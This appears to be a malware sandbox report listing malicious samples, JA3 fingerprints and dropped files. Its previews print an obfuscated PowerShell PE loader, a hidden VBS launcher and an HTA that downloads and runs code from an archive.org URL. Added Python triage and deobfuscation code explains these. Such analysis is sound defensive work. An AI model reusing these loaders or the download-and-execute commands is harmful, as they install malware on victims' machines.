 | 8b664227_by_Libranalysis.ppt | Get hash | malicious | Browse | 207.241.228.148
 | KUP ZAM#U00d3WIENIE-34002174.ppt | Get hash | malicious | Browse | 207.241.228.148
 | 280fdaa5_by_Libranalysis.ppt | Get hash | malicious | Browse | 207.241.228.148
 | Property.Report.vbs | Get hash | malicious | Browse | 207.241.227.110
 | VCKBY846628.vbs | Get hash | malicious | Browse | 207.241.227.118
 | Appraisal.report.vbs | Get hash | malicious | Browse | 207.241.224.2
 | NEW PO - CE AUSTRALIA PTY LTD.xls | Get hash | malicious | Browse | 207.241.228.147
 | Z0PVKGyuxF.exe | Get hash | malicious | Browse | 207.241.224.2
 | JZ74.vbs | Get hash | malicious | Browse | 207.241.227.112
 | b44c460b_by_Libranalysis.xlsm | Get hash | malicious | Browse | 207.241.228.151
 | 78a4d352_by_Libranalysis.xlsm | Get hash | malicious | Browse | 207.241.228.151
 | bb37e159_by_Libranalysis.xlsm | Get hash | malicious | Browse | 207.241.227.128
 | a423d144_by_Libranalysis.xlsm | Get hash | malicious | Browse | 207.241.228.151
 | Appraisal.reportl11004452699001.vbs | Get hash | malicious | Browse | 207.241.227.127

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Urgent Contract Order GH7856648,pdf.exe | Get hash | malicious | Browse | 207.241.227.119, 207.241.224.2, 207.241.232.198, 207.241.227.126
 | fuoAl0V94I.exe | Get hash | malicious | Browse | 207.241.227.119, 207.241.224.2, 207.241.232.198, 207.241.227.126
 | Consignment Details&Original BL Draft.exe | Get hash | malicious | Browse | 207.241.227.119, 207.241.224.2, 207.241.232.198, 207.241.227.126
 | 2320900000000.exe | Get hash | malicious | Browse | 207.241.227.119, 207.241.224.2, 207.241.232.198, 207.241.227.126
 | NEW ORDER 112888#.exe | Get hash | malicious | Browse |
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Transfer-Advice000601021_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  WcHO1ZGiIn.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  3c2pU82NQD.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  RFQ-sib.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.825.24532.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SWIFT COMMERCIAL DUTY 0218J.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  b7cgnOpObK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090009000000090.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice_OS169ENG 000003893148.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112

Dropped Files

No context

Created / dropped Files

C:\Users\Public\-----Run+++++++++.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: modified
Size (bytes): 780610
Entropy (8bit): 3.7041478671513444
Encrypted: false
SSDEEP: 6144:ZWG30D0btNi7GUMC0a4dqWzYnx6fLRNmgvlFw9GMC68jDnyZT1JUOCN3N4mGNY/N:LZtnNqONsZtnNqOg
MD5: 10305A80924712940646CCA278CEE796
SHA1: 6DB80D4B3828F14AE105DF2BA8AB3ECCF2AB682F
SHA-256: 2EC32C9EFDB4BA49EFC12BFDA4EBC8DDE498C618E3746F71BA72DA884F8573C0
SHA-512: 7EFC040A317BCD3B5F3692F5930ECFEA7CD4C52DD65727ED0C24907D3C01A142FB0F9B805CD21743AB635D1C00E8C4F3DA0D2D8384DCE308C7C296F2A1369C09
Malicious: false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)..{.. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing".. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)).. return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG..}....Function HBar {.. .. [CmdletBinding()].. [OutputType([byte[]])].. param(.. [Parameter(Mandatory=$true)] [String]$H3.. ).. $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2).. for ($i = 0; $i -lt $H3.Length; $i += 2) {.. $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16).. }.... return [byte[]]$H2..}..[String]$H4 = '4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24----------
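The preview above shows the loader's two helpers: a Base64 decoder whose method name is built from concatenated fragments ("Fr"+"omBa"+"se6"+"4Str"+"ing"), and HBar, which turns a hex string into a byte array. The $H4 string that follows starts 4D5A9----3-------4------FFFF----B8, which is an MZ header with every 0 nibble replaced by a dash: the blob never contains 4D5A9000, so a signature written for hex-encoded PE headers misses it. The call that restores the zeros before HBar runs lies past the end of the preview and is therefore an assumption here. The following Python is an added triage example, not code from the report or from the sample: it reverses the visible encoding on the preview's own prefix (embedded as constructed input), checks that the result is a valid DOS header, and carries a hunting regex for the dashed pattern.

```python
import re
import struct

# Constructed sample: the visible prefix of $H4 from the preview of
# C:\Users\Public\-----Run+++++++++.ps1. The preview is cut off, so this covers
# only the DOS header and stub, not the whole embedded image.
SAMPLE_H4 = (
    "4D5A9----3-------4------FFFF----B8--------------"
    "4-----------------------------------------------------------------------8"
    "--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742"
    "-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24----------"
)

# Hunting pattern: an MZ header whose zero nibbles were swapped for '-'.
DASHED_MZ = re.compile(r"4D5A9-{3,}", re.IGNORECASE)


def undash(blob: str) -> str:
    """Undo the '0' -> '-' substitution.

    Assumption: the script restores the zeros (a .Replace('-','0') or similar)
    before calling HBar; that step is not inside the preview. The visible prefix
    decodes to a valid MZ/DOS header only under this substitution, which is what
    triage() checks.
    """
    return blob.replace("-", "0")


def hbar(hexstr: str) -> bytes:
    """Equivalent of the script's HBar: pairs of hex digits -> bytes.
    A truncated preview can end on a half byte; drop it rather than raise."""
    if len(hexstr) % 2:
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr)


def parse_dos_header(data: bytes) -> dict:
    """Pull the fields that show the blob is a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return {
        "e_lfanew": e_lfanew,
        "has_dos_stub": b"This program cannot be run in DOS mode." in data,
        # True only once the blob extends past the DOS stub to the PE signature.
        "pe_signature": data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00",
    }


def triage(blob: str) -> dict:
    """Decode a dashed hex blob and report what the header says about it."""
    data = hbar(undash(blob))
    info = parse_dos_header(data)
    info["decoded_bytes"] = len(data)
    info["hidden_zero_nibbles"] = blob.count("-")
    return info


def looks_like_dashed_pe(script_text: str) -> bool:
    """Hunting check for other scripts using the same encoding."""
    return DASHED_MZ.search(script_text) is not None


if __name__ == "__main__":
    print(triage(SAMPLE_H4))
```

On the preview's prefix the decoded header reads e_lfanew = 0x80 and contains the standard DOS stub text, so the dashes are zeros and the full $H4 is a PE image carried inside the script; the PE signature itself is not reachable from the truncated preview. The regex is deliberately loose (any 4D5A9 followed by three or more dashes) because the trailing nibbles of the header vary between compilers.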
                                                                                                                                                                                                                  C:\Users\Public\Run\Run.vbs
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):433
                                                                                                                                                                                                                  Entropy (8bit):4.896166781572193
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:jaiugaiuTfhUZDiwgARQpSt0rBvxF4mlvIkWFFiw/5JTxz3iuw:jpuwuTSZDirAerxD4iIPFFiYJTcuw
                                                                                                                                                                                                                  MD5:B61084C93B7923021799A1F3D9756182
                                                                                                                                                                                                                  SHA1:9744FD3D75F7F1A6DFB2B3F8C52F21551A96036D
                                                                                                                                                                                                                  SHA-256:70D7CBCE07A5D72764B38923ADE703FAE0BD6FFB2AA435D8A6988E6C66EC89BB
                                                                                                                                                                                                                  SHA-512:ADA6AA5E741F4548050D3CC5D1D700D1B8619F65E44F1D009396E218763F01A255DA170B31E454D44ADF6D7AC714A4477A5A47A7FE27FE8EBD8BA8A0F782EF9D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: Dim FDGFDHGFJGKUGK..Set FDGFDHGFJGKUGK= CreateObject("WScript.Shell")..HVJHGJYGUGKUGU="po"..HHGJUGLHIUGUGKUG="wers"..KUHIHGKYFUYTFUYUYFU="hell -ExecutionPolicy "..DHYJGKUGKUGFUTYTFUY = " Bypass &"..GFDRYTFUGUTUYURFUTR ="'C:\Users\Public"..DTFYHJGJGJYGUTRYTFY = "\-----Run+++++++++.ps1'"..OK = HVJHGJYGUGKUGU+HHGJUGLHIUGUGKUG+KUHIHGKYFUYTFUYUYFU+DHYJGKUGKUGFUTYTFUY++GFDRYTFUGUTUYURFUTR+DTFYHJGJGJYGUTRYTFY+""..FDGFDHGFJGKUGK.Run OK,0
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.log
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\xGrfj8RvYg.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                                  Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                  MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                  Entropy (8bit):5.23215309792381
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:Msp1CIvQmYnlJAGbRUGgSWGQMgnibRFYMbW:np1Cn/A5G5QM3RFPbW
                                                                                                                                                                                                                  MD5:A3B75BE1163014E2F01E87ADC2D49724
                                                                                                                                                                                                                  SHA1:9F8DB267FC3F9263651BDBDABD04FC4B940B0123
                                                                                                                                                                                                                  SHA-256:5A7102CD16FBC915648876A6419231546ADC9E04D50C0F9B71E5D922CA10D9B5
                                                                                                                                                                                                                  SHA-512:2A9CFE2A8B9B90FBC2F866AE294EB422B2926A726CC1674441E216509C07EB07CF65803FE7B59791EB7E393BA278C2E8720D4A00E9E1E64474E32C811D2F869D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, Author: Arnim Rupp
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  IE Cache URL:https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
                                                                                                                                                                                                                  Preview: <HTML>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<HEAD>..<script language="VBScript">..Window.ReSizeTo 0, 0..Window.moveTo -7000,-7000..Dim FFFFFFFFFFFFFFF..Set FFFFFFFFFFFFFFF= CreateObject("WScript.Shell")..EEEEEEEEEEE="p"..OOOOOOOOOOOOOO = "O"+"We"..ZZZZZZZZZZZZZZZZZ ="RsHe"..BBBBBBBBBBBBBBBBBBBBB = "L"..VVVVVVVVVVVVVVV ="L $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEE
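Run.vbs (above) and this HTA build their command lines the same way: short string fragments are assigned to junk-named variables and then concatenated into the single argument of a WScript.Shell .Run call, with the HTA's PowerShell layer adding a second cosmetic layer on top ('Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load'), 'WebBANKnt'.Replace('BANK','Clie'), I`E`X). The webshell_asp_obfuscated YARA hit is consistent with that rather than evidence of a webshell: classic ASP pages are written in the same VBScript the HTA uses, so a rule for obfuscated VBScript string handling matches here too. The following Python is an added analysis example, not code from the report or from the sample. It resolves the VBScript concatenation statically and folds the PowerShell literal tricks; Run.vbs is reproduced from its preview as constructed input, and the HTA's PowerShell fragment is used as far as the preview shows it. The HTA preview is cut off before its own .Run call, so that command line is not reconstructed.

```python
import re

# Constructed sample: C:\Users\Public\Run\Run.vbs reproduced from its preview
# above (the ".." in the preview are CRLF line breaks).
RUN_VBS = r'''Dim FDGFDHGFJGKUGK
Set FDGFDHGFJGKUGK= CreateObject("WScript.Shell")
HVJHGJYGUGKUGU="po"
HHGJUGLHIUGUGKUG="wers"
KUHIHGKYFUYTFUYUYFU="hell -ExecutionPolicy "
DHYJGKUGKUGFUTYTFUY = " Bypass &"
GFDRYTFUGUTUYURFUTR ="'C:\Users\Public"
DTFYHJGJGJYGUTRYTFY = "\-----Run+++++++++.ps1'"
OK = HVJHGJYGUGKUGU+HHGJUGLHIUGUGKUG+KUHIHGKYFUYTFUYUYFU+DHYJGKUGKUGFUTYTFUY++GFDRYTFUGUTUYURFUTR+DTFYHJGJGJYGUTRYTFY+""
FDGFDHGFJGKUGK.Run OK,0
'''

# Constructed sample: the PowerShell fragment embedded in the HTA's
# VVVVVVVVVVVVVVV literal, as far as the preview above shows it.
HTA_PS_FRAGMENT = (
    "$TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';"
    "$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');"
    "$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');"
    "$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');"
    "$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');"
    "I`E`X ($EEEEEE"
)

_VBS_ASSIGN = re.compile(r"^\s*(?!Set\b)([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
_VBS_RUN = re.compile(r"^\s*[A-Za-z_]\w*\.Run\s+(.+?)\s*,\s*(\d+)\s*$")


def _split_concat(expr: str) -> list:
    """Split a VBScript expression on '+' signs that sit outside string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "+" and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts]


def _eval_vbs(expr: str, env: dict) -> str:
    """Evaluate a concatenation of string literals and already-known variables."""
    out = []
    for tok in _split_concat(expr):
        if not tok:                 # empty operand: the sample's "++" and the trailing +""
            continue
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            out.append(tok[1:-1].replace('""', '"'))
        elif tok in env:
            out.append(env[tok])
        else:
            raise ValueError(f"unresolved operand {tok!r}")
    return "".join(out)


def resolve_vbs_run(src: str):
    """Return (command_line, window_style) for the WScript.Shell .Run call."""
    env = {}
    for line in src.splitlines():
        m = _VBS_RUN.match(line)
        if m:
            return _eval_vbs(m.group(1), env), int(m.group(2))
        m = _VBS_ASSIGN.match(line)
        if m:
            env[m.group(1)] = _eval_vbs(m.group(2), env)
    raise ValueError("no .Run call found")


_PS_REPLACE = re.compile(r"'([^']*)'\.Replace\('([^']*)','([^']*)'\)", re.IGNORECASE)
# Backticks that escape something in Windows PowerShell 5.1 (lowercase forms only;
# an approximation, enough for the cosmetic I`E`X style seen here).
_PS_ESCAPES = set("0abfnrtv`'\"$")


def _fold_replace(code: str) -> str:
    """Evaluate 'literal'.Replace('old','new') chains; String.Replace is ordinal."""
    prev = None
    while prev != code:
        prev = code
        code = _PS_REPLACE.sub(
            lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", code)
    return code


def _strip_ticks(code: str) -> str:
    """Drop backticks that escape nothing; single-quoted literals are left alone."""
    out, in_sq = [], False
    for i, ch in enumerate(code):
        if ch == "'":
            in_sq = not in_sq
        elif ch == "`" and not in_sq and code[i + 1:i + 2] not in _PS_ESCAPES:
            continue
        out.append(ch)
    return "".join(out)


def normalize_ps(code: str) -> str:
    """Fold literal .Replace() calls, then remove cosmetic backticks."""
    return _strip_ticks(_fold_replace(code))


if __name__ == "__main__":
    print(resolve_vbs_run(RUN_VBS))
    print(normalize_ps(HTA_PS_FRAGMENT))
```

For Run.vbs the resolver yields a window style of 0 (hidden) and the command line powershell -ExecutionPolicy  Bypass &'C:\Users\Public\-----Run+++++++++.ps1' (the double space comes from the fragments "hell -ExecutionPolicy " and " Bypass &"), which matches the process tree the report attributes to powershell.exe. On the HTA fragment the literal folding recovers DownloadString, WebClient, NEt and (New-Obje, and the backtick pass turns I`E`X into IEX; the names being spliced together are System.Net.WebClient and its DownloadString method pointed at the second archive.org URL.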
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11883
                                                                                                                                                                                                                  Entropy (8bit):4.890750684634174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:4Vsm5emlQib4NxoeR93YrKkX9smlp5b4Q2Ca6pZlbjvwRjdHPRhjiMDOmEN3H+O8:4kib4WF43opbjvwRjdvRZiQ0HzAFaib9
                                                                                                                                                                                                                  MD5:6049E98CE5D644576C54D3F4844468ED
                                                                                                                                                                                                                  SHA1:58E3D61381D54FD51C0C913940FF9B952189A5D8
                                                                                                                                                                                                                  SHA-256:354ADD5966932A0ED1ABE70FE8A1850B215564290661E34E1FBCEB7989AA5803
                                                                                                                                                                                                                  SHA-512:44878B4BD939DFDB1B34EAEB94280E723FDC3068A1FFC56FA902906669DBDD88F8FEEECC2BE79E838A0841EFBCEE909765F9DE0BAFF01598436C8AC1F6956EAC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: PSMODULECACHE......<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4sskfsz.fda.psm1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
